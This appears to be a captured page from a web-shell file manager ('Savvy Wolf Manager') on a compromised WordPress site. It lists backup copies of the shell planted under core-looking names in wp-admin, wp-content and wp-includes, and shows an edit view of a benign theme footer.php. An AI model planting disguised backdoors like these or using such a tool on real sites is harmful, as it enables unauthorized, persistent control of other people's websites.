Backups Created:
/home/teltatz/public_html/wp-admin/admin-wolf.php
/home/teltatz/public_html/wp-content/edit-wolf.php
/home/teltatz/public_html/wp-includes/widgets/class-wp-wolf-widget.php
Savvy
W
olf -
MANAGER
Edit File: footer.php
<?php /** * @Packge : Edura * @Version : 1.0 * @Author : Themeholy * @Author URI : https://www.themeholy.com/ * */ // Block direct access if ( ! defined( 'ABSPATH' ) ) { exit; } if( !is_404( ) ) { /** * * Hook for Footer Content * * Hook edura_footer_content * * @Hooked edura_footer_content_cb 10 * */ do_action( 'edura_footer_content' ); /** * * Hook for Back to Top Button * * Hook edura_back_to_top * * @Hooked edura_back_to_top_cb 10 * */ do_action( 'edura_back_to_top' ); } wp_footer(); ?> </body> </html>